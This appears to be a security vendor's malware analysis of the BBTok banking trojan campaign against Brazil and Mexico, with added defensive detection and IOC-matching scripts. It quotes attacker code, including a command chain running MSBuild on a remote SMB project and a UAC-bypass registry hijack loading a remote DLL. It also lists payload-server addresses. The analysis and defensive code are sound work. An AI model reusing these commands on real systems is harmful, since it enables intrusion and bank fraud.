
Introduction

Check Point Research recently discovered an active campaign operating and deploying a new variant of the BBTok banker in Latin America. In the research, we highlight newly discovered infection chains that use a unique combination of Living off the Land Binaries (LOLBins), resulting in low detection rates even though the BBTok banker has been operating since at least 2020. As we analyzed the campaign, we came across some of the threat actor’s server-side resources used in the attacks, targeting hundreds of users in Brazil and Mexico.

The server-side components are responsible for serving malicious payloads that are likely distributed through phishing links. We’ve observed numerous iterations of the same server-side scripts and configuration files which demonstrate the evolution of the BBTok banker deployment methods over time. This insight allowed us to catch a glimpse of infection vectors that the actors have not yet implemented, as well as trace the origins of the source code employed for sustaining such operations.

In this report, we highlight some of the server-side functionalities of the payload server used to distribute the banker. These generate a unique payload for each victim at the moment of the click.

Key Findings

  1. BBTok continues being active, targeting users in Brazil and Mexico, employing multi-layered geo-fencing to ensure infected machines are from those countries only.
  2. Since the last public reporting on BBTok in 2020, the operators’ techniques, tactics and procedures (TTPs) have evolved significantly, adding additional layers of obfuscation and downloaders, resulting in low detection rates.
  3. The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card number.
  4. The newly identified payloads are generated by a custom server-side application, responsible for generating unique payloads for each victim based on operating system and location.
  5. Analysis of payload server-side code revealed the actors are actively maintaining diversified infection chains for different versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX, JS and XLL.
  6. The threat actors add open-source code, code from hacking forums, and new exploits when those appear (e.g. Follina) to their arsenal.

Background

The BBTok banker, first revealed in 2020, was deployed in Latin America through fileless attacks. The banker has a wide set of functionalities, including enumerating and killing processes, keyboard and mouse control and manipulating clipboard contents. Alongside those, BBTok contains classic banking Trojan features, simulating fake login pages to a wide variety of banks operating in Mexico and Brazil.

Since it was first publicly disclosed, the BBTok operators have adopted new TTPs, all while still primarily utilizing phishing emails with attachments for the initial infection. Recently we’ve seen indications of the banker distributed through phishing links, and not as attachments to the email itself.

Upon accessing the malicious link, an ISO or ZIP file is downloaded to the victim’s machines. Those contain an LNK file that kicks off the infection chain, leading to the deployment of the banker while opening a decoy document. Although the process appears to be quite straightforward upon first glimpse, we’ve found evidence that there’s a lot going on behind the scenes.

While analyzing these newly identified links, we’ve uncovered internal server-side resources used to distribute the malware. Looking at those, it became evident the actor has maintained a much wider variety of infection chains, generated on demand with each click, tailored to match the victim’s operating system and location.

BBTok Banking Hijacks

BBTok enables its operators a wide set of capabilities, ranging from remote commands to classic banking Trojan capabilities. BBTok can replicate the interfaces of multiple Latin American banks. Its code references over 40 major banks in Mexico and Brazil, such as Citibank, Scotibank, Banco Itaú and HSBC (see Appendix B for the full list of targeted banks). The banker searches for indications of its victims being clients of those banks by iterating over the open windows and names of browser tabs, searching for bank names.

The default target the banker apparently aims at is BBVA, with the default fake interface replicating its looks. Posing as legitimate institutions, these fake interfaces coax unsuspecting users into divulging personal and financial details. The focus of this functionality is tricking the victim into entering the security code / token number that serves as 2FA for the bank account, in order to take over the victim’s bank account. In some cases, this capability also aims to trick the victim into entering their payment card number.

Figure 1 – Examples of fake interfaces embedded within the BBTok Banker.

BBTok, which is written in Delphi, uses the Visual Component Library (VCL) to create forms that, quite literally, form these fake interfaces. This allows the attackers to dynamically and naturally generate interfaces that fit the victim’s computer screen and a specific form for the bank of the victim, without raising suspicion. BBVA, which is the default bank the banker targets, has its interface stored in one such form named “TFRMBG”. In addition to Banking sites, the attackers have kept up with the times and have also started searching for information regarding Bitcoin on the infected machine, actively looking for strings such as ‘bitcoin’, ‘Electrum’, and ‘binance’.

BBTok doesn’t stop at visual trickery; it has other capabilities as well. Specifically, it can install a malicious browser extension or inject a DLL named “rpp.dll” to further its hold on the infected system, likely to improve its ability to trick victims. Neither of these components was available at the time of analysis.

What’s notable is the operator’s cautious approach: all banking activities are only executed upon direct command from its C2 server, and are not automatically carried out on every infected system.

Payload Server Analysis

Overview of the Payload Server

To effectively manage their campaign, the BBTok operators created a unique flow kicked off by the victim clicking a malicious link, likely sent in a phishing email. When a victim clicks the link, it results in the download of either a ZIP archive or an ISO image, depending on the victim’s operating system. Although the process is seamless for the victim, the server generates a unique payload based on parameters found within the request.

Figure 2 – Server-side components used in BBTok infections.

This process is carried out on a XAMPP-based server, and contains three essential components:

  1. A PowerShell script that handles payload preparation and contains the main bulk of the logic for creating lure archives.
  2. A PHP codebase and database designed to document and manage infections.
  3. Auxiliary utilities that enhance the functionality of these components.

This is the chain of events:

  1. A victim performs an HTTP request to /baixar, /descargar or /descarga (these paths suggest that the lures are in either Spanish or Portuguese).
  2. Based on the .htaccess file, the server handles the request using descarga.php.
  3. The scripts utilize the file db.php to store information about the request, including the victim’s fingerprint, in an SQLite database.
  4. descarga.php calls ps_gen.ps1 to generate a custom archive, which is eventually delivered to the victim.

Incoming Requests Handling

The PHP codebase is composed of the following files:

  1. descarga / descargar.php – Manages new connections and serves lure documents to the victim’s PC.
  2. db.php – Generates and manages the SQLite database that includes the victim’s details.
  3. generator.php – Utility class used to generate random links, strings, and other functionalities.

“Descarga” and “descargar” translate to “download” in Spanish. This file contains the main logic of the infection process. The script itself contains many comments, some of them in plain Spanish and Portuguese, which provide hints as to the attackers’ origin.

The script logic:

  1. It looks up the geolocation of the link-referred victim’s IP address and stores the result in a file. If the victim isn’t from a targeted country (i.e., Mexico or Brazil), the HTTP connection ends immediately with a 404 message.

    $api = new IpApi();
    $whoAmI = $api->GetInfo($ip);
    $allowed = array("MX", "BR");
    file_put_contents("ips/".$ip.$whoAmI->countryCode, "");
    if(!in_array($whoAmI->countryCode, $allowed)) {
        // ... request is rejected with a 404 (body not included in the excerpt)
    }

  2. If the victim passes the check, the script then parses the user agent to get the victim’s Windows OS version.

    $useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT']));
    $match = false;
    $dfile = "10";
    $dfiles = array (
        'windows nt 10.0' => '10',
        'windows nt 6.3' => '10',
        'windows nt 6.2' => '10',
        'windows nt 6.1' => '7',
        'windows nt 6.0' => '7',
        'windows nt 5.2' => '7'
    );
    foreach($dfiles as $os=>$file) {
        if (preg_match('/' . $os . '/i', $useragent)) {
            $match = true;
            $dfile = $file;
        }
    }

  3. It then passes the user agent with the victim’s country code and lure filename to the PowerShell payload generator script.

PowerShell Payload Generator

The script ps_gen.ps1 contains the main logic for generating archive payloads, either as ZIP or ISO files. The latest version of the code has a lot of commented-out sections that were likely functional in the past, which suggests they contain additional infection chains and lures. We found multiple versions of the file, some dating back to July 2022, demonstrating that this operation has been ongoing for quite a while.

Our analysis of the latest version is below. For more details on earlier variations and changes to the script over time, see the section “Earlier Versions”.

The generator script is called by descarga.php, using the function DownloadFile with the arguments file_name, ver and cc. These correspond to the generated archive name, the victim’s OS version and the victim’s country code.

    function DownloadFile($file_name, $ver, $cc) {
        if($ver == "10" ) {
            $ext = "iso";
        } else {
            $ext = "zip";
        }
        exec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.' '.$ver.' '.$cc);
        return $file_name.'.'.$ext;
    }

The code portions utilized in the observed iteration of the server generate the archive payloads based on two parameters:

  1. The origin country of the victim – Brazil or Mexico.
  2. Operating System extracted from the User-Agent – Windows 10 or 7.

According to the results, the following parameters of the malicious archive are selected:

  1. Type of the archive: ISO for Windows 10, ZIP for Windows 7 and others.
  2. The name of the DLL file that is used in the next stage changes according to the targeted country: Trammy is used for Brazil, and Gammy is used for Mexico.
  3. The archive contains an LNK. The LNK shortcut icon in Windows 10 is the one used by Microsoft Edge, and the one for Windows 7 is used by Google Chrome.
  4. The final execution logic. For Windows 10 victims, the script executes MSBuild.exe with a file named dat.xml from the server 216[.]250[.]251[.]196, which also stores the malicious DLLs for the next stage. For Windows 7, the payload just downloads the relevant remote DLL via CMD execution.

    $shortcutName = $args[0]
    $win = $args[1]
    $country = $args[2]
    $stegoKey = New-StegoKey 35
    if($country -eq "BR") {
        $dllName = 'Trammy'
    } else {
        $dllName = 'Gammy'
    }
    if($win -eq "10") {
        $wstate = 7
        $shortcutIconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    } else {
        $wstate = 7
        $shortcutIconLocation = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
    }

Add-PoshObfuscation

All payloads are obfuscated using the Add-PoshObfuscation function. A simple search for parts of the code yields a single result from the “benign” site hackforums[.]net, specifically a response from a user named “Qismon” in August 2021. This individual recommends some methods to bypass AMSI and security products, and also shares the PoshObfuscation code:

Figure 3 – Add-PoshObfuscation() code shared in hackforums[.]net.

Infection Chains and Final Payload

The process described above eventually leads to two variations of the infection chain: one for Windows 7 and one for Windows 10. The differences between the two versions can be explained as attempts to avoid newly implemented detection mechanisms such as AMSI.

*ammy.dll Downloaders

Both infection chains utilize malicious DLLs named using a similar convention – Trammy, Gammy, Brammy, or Kammy. These are leaner and obfuscated versions of BBTok’s loader that use geofencing to thwart detection before executing any malicious actions. The final payload is a new version of the BBTok banker. As documented previously, BBTok comes packed with multiple additional password-protected software components. These allow the actors full access to the infected machine, along with additional functionalities.

Windows 7 Infection Chain

Figure 4 – Windows 7 Infection Chain.

The infection chain for Windows 7 is not unique and consists of an LNK file stored in a ZIP file. Upon execution, the LNK file runs the *ammy.dll payload using rundll32.exe, which in turn downloads, extracts, and runs the BBTok payload.

Windows 10 Infection Chain

Figure 5 – Windows 10 Infection Chain.

The infection chain for Windows 10 is stored in an ISO file containing 3 components: an LNK file, a lure file, and a renamed cmd.exe executable. Clicking the LNK file kicks off the infection chain, using the renamed cmd.exe to run all the commands in the following manner:

    DANFE352023067616112\DANFE352023067616112.exe /c copy %cd%\DANFE352023067616112\DANFE352023067616112.pdf %userprofile%\DANFE352023067616112.pdf /Y & start %userprofile%\DANFE352023067616112.pdf & C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -nologo \\\file\dat.xml

The infection chain:

  1. Copy the lure file to the folder %userprofile% and open it.

Figure 6 – Lure document dropped in BBTok infection.

  2. Run MSBuild.exe to build an application using an XML stored on a remote server, fetched over SMB.
  3. MSBuild.exe creates a randomly named DLL, which in turn downloads *ammy.dll from the server and runs it with a renamed rundll32.exe (mmd.exe), as seen in the XML contents:

    private void ByFD() {
        String reg = "/c REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d \"C:\\ProgramData\\mmd.exe \\\\\\file\\Trammy.dll, Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f & REG DELETE HKCU\\Software\\Classes\\.pwn /f\" /f & REG ADD HKCU\\Software\\Classes\\ms-settings\\CurVer -ve /d \".pwn\" /f & timeout /t 3 >nul & start /MIN computerdefaults.exe";
        StartProcess("cmd.exe", reg);
    }

  4. The *ammy.dll downloader downloads, extracts, and runs the BBTok payload.

The unique combination of renamed CMD, MSBuild, and file fetching over SMB results in a low detection rate for the Windows 10 infection chains.
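Low detection by file-based scanners does not mean the chain is invisible: it leaves several host artefacts that are cheap to alert on. The following Python is an added example, not code from the report or from Check Point. It runs four rules over constructed Sysmon-style process-creation (EventID 1) and registry (EventID 13) records: a renamed cmd.exe, rundll32.exe or MSBuild.exe (PE OriginalFileName disagreeing with the on-disk image name), MSBuild handed a project file on a UNC path, rundll32 loading a DLL from a UNC path, and a write to the ms-settings ProgID in the user hive, which covers both the computerdefaults variant shown in ByFD and the fodhelper variant the report mentions among the older bat files. The event records, their field layout and the 203.0.113.10 host are constructed for the example; the real chain used a redacted SMB server.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (EventID 1 = process creation, EventID 13 = registry value set),
# modelled on the Windows 10 chain described above. 203.0.113.10 is a documentation address
# standing in for the redacted SMB host; none of these records is real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"D:\DANFE352023067616112\DANFE352023067616112.exe",
     "OriginalFileName": "Cmd.Exe",   # renamed cmd.exe shipped inside the ISO
     "CommandLine": (r"DANFE352023067616112\DANFE352023067616112.exe /c copy "
                     r"%cd%\DANFE352023067616112\DANFE352023067616112.pdf %userprofile%\DANFE352023067616112.pdf /Y "
                     r"& start %userprofile%\DANFE352023067616112.pdf "
                     r"& C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -nologo \\203.0.113.10\file\dat.xml")},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "OriginalFileName": "MSBuild.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -nologo \\203.0.113.10\file\dat.xml"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\ms-settings\CurVer\(Default)",
     "Details": ".pwn"},
    {"EventID": 1, "Image": r"C:\ProgramData\mmd.exe",
     "OriginalFileName": "RUNDLL32.EXE",  # renamed rundll32.exe
     "CommandLine": r"C:\ProgramData\mmd.exe \\203.0.113.10\file\Trammy.dll, Dacl"},
    # Benign noise the rules must not flag: a local build and an ordinary cmd.exe.
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "OriginalFileName": "MSBuild.exe",
     "CommandLine": r"MSBuild.exe -nologo C:\src\app\app.csproj"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "Cmd.Exe", "CommandLine": r"cmd.exe /c dir"},
]

# A UNC path: two backslashes, a host, a backslash, then the share/file part.
UNC_PATH = re.compile(r"\\\\[\w.\-]+\\[^\s\"']+")
# Hijack of the ms-settings ProgID under the user hive; both the computerdefaults and the
# fodhelper bypass variants rely on it.
MS_SETTINGS_HIJACK = re.compile(r"\\Software\\Classes\\ms-settings\\(CurVer|Shell\\Open\\command)",
                                re.IGNORECASE)
WATCHED_LOLBINS = {"cmd.exe", "rundll32.exe", "msbuild.exe"}


def image_name(ev):
    return PureWindowsPath(ev.get("Image", "")).name.lower()


def renamed_lolbin(ev):
    """PE metadata says cmd/rundll32/MSBuild, but the on-disk name differs."""
    orig = ev.get("OriginalFileName", "").lower()
    return orig in WATCHED_LOLBINS and image_name(ev) != orig


def msbuild_unc_project(ev):
    """MSBuild invoked with a project file that lives on a remote SMB share."""
    cmd = ev.get("CommandLine", "")
    return "msbuild" in cmd.lower() and UNC_PATH.search(cmd) is not None


def rundll32_unc_dll(ev):
    """rundll32 (renamed or not) loading a DLL straight from a UNC path."""
    if ev.get("OriginalFileName", "").lower() != "rundll32.exe":
        return False
    return any(".dll" in m.lower() for m in UNC_PATH.findall(ev.get("CommandLine", "")))


def ms_settings_hijack(ev):
    """Registry write that redirects the ms-settings handler in HKCU/HKU."""
    return ev.get("EventID") == 13 and MS_SETTINGS_HIJACK.search(ev.get("TargetObject", "")) is not None


RULES = {
    "renamed_lolbin": renamed_lolbin,
    "msbuild_unc_project": msbuild_unc_project,
    "rundll32_unc_dll": rundll32_unc_dll,
    "ms_settings_hijack": ms_settings_hijack,
}


def detect(events):
    """Return (rule_name, event_index) for every rule that fires on every event."""
    return [(name, idx) for idx, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"{name:22s} event[{idx}] {ev.get('CommandLine') or ev.get('TargetObject')}")
```

The renamed-binary rule depends on a source that records the PE OriginalFileName (Sysmon does; not every EDR exposes it), and the MSBuild rule will also fire on the parent cmd.exe command line, which is useful because the MSBuild child may be short-lived. The local build in the noise set shows why the UNC requirement matters: MSBuild itself is common on developer machines.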

Earlier Versions

Throughout our analysis of the BBTok campaign, we came across multiple versions of the artifacts from the payload server. We saw changes in all parts of the operation: the PHP code, the PowerShell script, and other utilities.

Changes in the PHP Code

Looking at an earlier version of the descarga.php script, we saw a few key differences:

  1. Originally, only victims from Mexico were targeted.
  2. The IP of a different payload server, 176[.]31[.]159[.]196, was hard-coded in the script.
  3. Instead of executing the PowerShell script directly, a script named gen.php was called. We were unable to obtain this script, but believe it simply executed the PowerShell script.
  4. The victim’s IP address, user agent, and a flag (jaBaixou, or ‘already downloaded’ in Portuguese) were inserted into a database using the db.php file. The flag is later checked so that the same payload is not served twice.

As this section is not used in the latest version, it is possible that the attackers found this process cumbersome and decided to trade OPSEC for easier management and a higher chance of infection success.

Modifications of the PowerShell Script

Looking at older versions of the PowerShell script, it was clear that numerous changes were done to the payload and execution chain. Some noteworthy ones include:

  1. In the earliest versions of the script, the LNK simply ran a PowerShell script with the arguments -ExecutionPolicy Unrestricted -W hidden -File \\%PARAM%[.]supplier[.]serveftp[.]net\files\asd.ps1.
  2. A later update added the lure PDF, fac.pdf (“fac” is an abbreviation of “factura”, which is “invoice” in Portuguese). This is a legitimate receipt, in Spanish, from the county of Colima in Mexico. Additionally, the payload for Windows 7 victims launched a legitimate Mexican government site, hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html.
  3. The newest version we found opens a different legitimate site, hxxps://fazenda[.]gov[.]br, a Brazilian government site. This version also changes the XML file used by MSBuild and changes the name of the DLL reserved for Brazilian targets from Brammy.dll to Trammy.dll.

Unused Code and Infection Vectors

Certain sections of the code within the PowerShell script were unused, and the server hosted files that were not part of the primary infection flow we discussed. In particular, we did not discover any indication of active usage of the following:

  1. ze.docx is a document that exploits the Follina vulnerability (CVE-2022-30190). It is referenced in the PowerShell script in a function named CreateDoc.
  2. xll.xll, which is referenced by CreateXLL, is a malicious XLL taken from an open-source project that implements code execution via Excel.
  3. Numerous empty JavaScript files were found on the server, likely to be used by a function named CreateJS. The file referenced in the function, b.js, was empty, so it is unclear whether this function was previously used or was never fully implemented.
  4. Multiple bat files were located on the server, each with a different implementation of downloading next stages. These were most likely created by a function named CreateBat, which is commented out in the latest version of the PowerShell script. Most of them are almost identical to the code in the ByFD function we analyzed previously, excluding two noteworthy past iterations:

    1. The oldest bat file downloaded another PowerShell script as a next stage (which is no longer publicly available) instead of editing the registry;
    2. A later bat file used the fodhelper UAC bypass instead of the computerdefaults one that is currently being used.

Victimology and Attribution

Our analysis of the server-side component also sheds light on one of the recent campaigns as seen from the threat actors’ side, based on a database we found that documents access to the malicious application. The database is named links.sqlite and is pretty straightforward. It contains over 150 entries, all unique, with the table headers corresponding to the ones created by db.php. Note the use of the Portuguese language in the names of the 4 columns:

  1. chave, or key;
  2. assunto, or subject;
  3. user_agent;
  4. baixou, or downloaded.

The column named chave contained the IP addresses of the victims, and the column assunto was empty:

Figure 7 – Links.sqlite database.
Figure 8 – Attack region.
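An analyst who recovers a database like this usually wants a quick picture of it before anything else: how many rows, how many distinct victims, how many actually downloaded, and which payload variant each would have received. The following Python is an added example, not part of the report or of the actors’ db.php. It builds an in-memory SQLite table with the four column names listed above (the table name, the column types and every row are assumptions constructed for the example, using documentation IP ranges), then summarises it, bucketing each user agent with the same Windows NT version mapping that descarga.php applies so the rows can be split by the variant the server would have generated.

```python
import re
import sqlite3

# Column names are those reported for links.sqlite; the table name and types are assumptions.
SCHEMA = "CREATE TABLE links (chave TEXT, assunto TEXT, user_agent TEXT, baixou INTEGER)"

# Constructed rows using documentation IP ranges; not entries from the real database.
CONSTRUCTED_ROWS = [
    ("203.0.113.5",  "", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", 1),
    ("203.0.113.6",  "", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", 1),
    ("198.51.100.7", "", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36", 0),
    ("198.51.100.8", "", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15", 0),
    ("203.0.113.9",  "", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", 1),
]

# The same version-to-payload mapping descarga.php uses: NT 10.0/6.3/6.2 -> "10", 6.1/6.0/5.2 -> "7".
OS_BUCKETS = {"10.0": "10", "6.3": "10", "6.2": "10", "6.1": "7", "6.0": "7", "5.2": "7"}
NT_VERSION = re.compile(r"windows nt (\d+\.\d+)", re.IGNORECASE)


def os_bucket(user_agent):
    """Payload variant the server would pick for this user agent ("10", "7" or "other")."""
    m = NT_VERSION.search(user_agent or "")
    return OS_BUCKETS.get(m.group(1), "other") if m else "other"


def load_constructed_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO links VALUES (?, ?, ?, ?)", CONSTRUCTED_ROWS)
    conn.commit()
    return conn


def summarize(conn):
    """Row count, distinct victim IPs, completed downloads and a per-variant breakdown."""
    total = conn.execute("SELECT COUNT(*) FROM links").fetchone()[0]
    distinct_ips = conn.execute("SELECT COUNT(DISTINCT chave) FROM links").fetchone()[0]
    downloaded = conn.execute("SELECT COUNT(*) FROM links WHERE baixou = 1").fetchone()[0]
    by_os = {}
    for (ua,) in conn.execute("SELECT user_agent FROM links"):
        bucket = os_bucket(ua)
        by_os[bucket] = by_os.get(bucket, 0) + 1
    return {"total": total, "distinct_ips": distinct_ips, "downloaded": downloaded, "by_os": by_os}


def victims_for_payload(conn, bucket):
    """IPs whose user agent would have received the given payload variant ("10" or "7")."""
    return sorted(ip for ip, ua in conn.execute("SELECT chave, user_agent FROM links")
                  if os_bucket(ua) == bucket)


if __name__ == "__main__":
    db = load_constructed_db()
    print(summarize(db))
    print("Windows 7 variant recipients:", victims_for_payload(db, "7"))
```

Against a real recovered file you would open it with sqlite3.connect(path) instead of building it, and the chave column gives you a victim notification list directly; the per-variant split tells you which of the two infection chains above to hunt for on each host.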

As the server code was never meant to be seen by anyone except the threat actors, and it contained numerous comments in Portuguese, we believe this indicates with high probability that the threat actors are Brazilian. Brazil is known for its active banking malware ecosystem.

Conclusion

Although BBTok has been able to remain under the radar due to its elusive techniques and targeting victims only in Mexico and Brazil, it’s evident that it is still actively deployed. Due to its many capabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.

It is rare for security researchers to get an up-close look at the attackers’ workbench, and even rarer to get glimpses of it as it evolved over time. What we saw reinforces our belief that all threat actors, including financially motivated ones, are constantly evolving and improving their methods, as well as following new security trends and trying out fresh ideas and opportunities. To keep up and protect against future attacks, security researchers must do the same.

Check Point Protections

Check Point Threat Emulation:

  • Banker.Wins.BBTok.A
  • Banker.Win.BBTok.B
  • Technique.Wins.SuxXll.A
  • Trojan.Win.XllAddings.A

Harmony Endpoint:

  • Trojan.Win.Generic.AQ
  • Trojan.Win.Generic.AR

Appendix A – IOCs

Files

Name – Description – sha256

DANFE357702036539112.iso – Brazilian Lure Archive – be36c832a1186fd752dd975d31284bdd2ac3342bd3d32980c6c52271d0d2c84c
DANFE357666506667634.iso – Brazilian Lure Archive – 095b793d60ce5b15fac035e03d41f1ddd2e462ec4fa00ccf20553af3c09656f6
DANFE352023067616112.iso – Brazilian Lure Archive – 8e65383a91716b87651d3fa60bc39967927ab01b230086e3c5a2f9a096fc6c57
DANFE358567378531506.pdf – Brazilian Lure PDF – 825a5c221cb8247831745d44b424954c99e9023843c96def6baf84ccb62e9e5f
Brammy.dll – BBTok Downloader for Brazilian Victims
Trammy.dll – BBTok Downloader for Brazilian Victims
HtmlFactura3f48daa069f0e42253194ca7b51e7481DPCYKJ4Ojk.iso – Mexican Lure Archive – 808e0ddccd5ae4b8cbc4747a5ee044356b7aa67354724519d1e54efb2fc4f6ec
HtmlFactura-497fc589432931214ed0f7f4de320f3brzi8y1MTdn.iso – Mexican Lure Archive – f83b33acfd9390309eefb4a17b42e89dcdbe759757844a3d9b474d570ddbab86
HtmlFactura-4887f50edb734a49d33639883b60796do52lTREjMh.iso – Mexican Lure Archive – dbeb4960cdb04999c1a5a3360c9112e3bc1de79534d7ac9027b7fdb7798968a6
Html-Factura35493606948895934113728188857090JCOY.pdf – Mexican Lure PDF – be35b48dfec1cc2fc046423036fa76fc9096123efadac065c80361c45f401d3c
Kammy.dll – BBTok Downloader for Mexican Victims
Gammy.dll – BBTok Downloader for Mexican Victims
ze.docx – Unused Maldoc – 3b43de8555d8f413a797e19c414a55578882ad7bbcb6ad7604bb1818dd3eedcd
xll.xll – Unused Malicious xll – fb7a958b99275caa0c04be2a821b2a821bb797c4be6bd049fa09144de349ea41
fe – BBTok – cd22e14f4fa6716cfc9964fdead813d2ffb80d6dd716e2114f987ff36cc5e872
fe2 – BBTok – 5c59cd977890ed32eb60caca8dc2c9a667cff4edc2b12011854310474d5f405d
fe2 – BBTok – 5ad42b39f368a25a00d9fe15fa5326101c43bf4c296b64c1556bc49beeee9ae1
fe235 – BBTok – b198da893972df5b0f2cbcec859c0b6c88bb3cf285477b672b4f40c104bcbd36

Network Indicators

Name – Description

(name not shown) – Phishing Domain
rendinfo[.]shop – Phishing Domain
(name not shown) – Malicious DLL Download Domain
216[.]250[.]251[.]196 – Payload Server
173[.]249[.]196[.]195 – Payload Server
176[.]31[.]159[.]196 – Payload Server
147[.]124[.]213[.]152 – Payload Server
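To use these indicators in a SIEM they have to be refanged and then matched in a way that does not fire on longer strings that merely contain them (a hash embedded in a longer hex blob, an IP that is a substring of a hostname). The following Python is an added example, not part of the report: it refangs a subset of the indicators from Appendix A, validates their shape before compiling them, and searches constructed proxy and EDR log lines with word-bounded, case-insensitive patterns. The log lines, the 10.x client addresses and the host names in them are constructed for the example.

```python
import re

# Defanged indicators copied from Appendix A; only a subset of the hashes is used here.
PAGE_IOCS = {
    "domain": ["rendinfo[.]shop"],
    "ip": ["216[.]250[.]251[.]196", "173[.]249[.]196[.]195",
           "176[.]31[.]159[.]196", "147[.]124[.]213[.]152"],
    "sha256": ["8e65383a91716b87651d3fa60bc39967927ab01b230086e3c5a2f9a096fc6c57",  # DANFE352023067616112.iso
               "cd22e14f4fa6716cfc9964fdead813d2ffb80d6dd716e2114f987ff36cc5e872"],  # fe (BBTok)
}

# Constructed proxy and EDR lines for the demonstration; not real logs.
SAMPLE_LOGS = [
    '2023-09-01T10:02:11Z proxy allow 10.0.0.14 GET https://rendinfo.shop/descarga ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2023-09-01T10:02:13Z proxy allow 10.0.0.14 GET http://216.250.251.196/file/dat.xml',
    '2023-09-01T10:02:20Z edr filehash host=WS-014 path=C:\\Users\\u\\Downloads\\DANFE352023067616112.iso '
    'sha256=8E65383A91716B87651D3FA60BC39967927AB01B230086E3C5A2F9A096FC6C57',
    '2023-09-01T10:05:00Z proxy allow 10.0.0.22 GET https://www.example.com/ ua="..."',
    # Contains the payload IP only as a substring of a hostname: must not match.
    '2023-09-01T10:06:00Z proxy allow 10.0.0.23 GET http://10.216.250.251.196.nip.io/',
]


def refang(ioc):
    """Undo the report's defanging so indicators match what appears in logs."""
    return (ioc.replace("[.]", ".").replace("[:]", ":")
               .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def validate(kind, value):
    """Reject malformed indicators before they turn into silent non-matching patterns."""
    if kind == "sha256":
        return re.fullmatch(r"[0-9a-f]{64}", value) is not None
    if kind == "ip":
        parts = value.split(".")
        return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)
    if kind == "domain":
        return re.fullmatch(r"[a-z0-9.-]+\.[a-z]{2,}", value) is not None
    return False


def compile_iocs(page_iocs):
    """Refang, validate and compile each indicator into a word-bounded, case-insensitive pattern."""
    compiled = []
    for kind, values in page_iocs.items():
        for raw in values:
            value = refang(raw).lower()
            if not validate(kind, value):
                raise ValueError(f"malformed {kind} indicator: {raw}")
            # Not preceded by a word char, dot or dash, and not followed by a word char or dash,
            # so 216.250.251.196 does not match inside 10.216.250.251.196.nip.io.
            pattern = re.compile(r"(?<![\w.-])" + re.escape(value) + r"(?![\w-])", re.IGNORECASE)
            compiled.append((kind, value, pattern))
    return compiled


def scan_lines(lines, compiled):
    """Return (line_index, kind, indicator) for every indicator found in every line."""
    return [(i, kind, value)
            for i, line in enumerate(lines)
            for kind, value, pat in compiled if pat.search(line)]


if __name__ == "__main__":
    for i, kind, value in scan_lines(SAMPLE_LOGS, compile_iocs(PAGE_IOCS)):
        print(f"line {i}: {kind} {value}")
```

Hash matching is case-insensitive because EDR products disagree on hex casing, and the domain pattern deliberately does not match subdomains; add a separate suffix pattern if you want rendinfo[.]shop to cover its subdomains as well.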

Appendix B – List of Targeted Banks

  • Banking Caixa
  • CCB Brasil
  • Banco Itaú
  • Mercantil do Brasil
  • Santander
  • BANCO PAULISTA
  • Getnet
  • Banco Daycoval
  • Sicredi
  • Mercado Pago
  • Sicoob
  • Nubank
  • Citibank Brasil
  • C6 Bank
  • Internet Banking BNB
  • Internet Banking Inter
  • Unicred Portal
  • Bancoob
  • Banco da Amazonia
  • BBVA
  • Banestes
  • Banorte
  • Banco Alfa
  • HSBC
  • Banpará
  • Banamex
  • Banese
  • Bajio
  • BRB Banknet
  • Scotiabank
  • Banco Intermedium
  • Afirme
  • Banco Topázio
  • Banregio
  • Uniprime
  • Azteca
  • Cooperativa de Crédito – CrediSIS
  • Multiva
  • Banco Original
  • Inbursa
  • Banco Fibra
  • CiBanco
  • Bradesco Despachantes e Auto Escola – Cidadetran
  • Sicoobnet
  • Navegador Exclusivo
  • Banco do Brasil


Copyright notice: posted by admin on September 21, 2023 at 9:15 AM.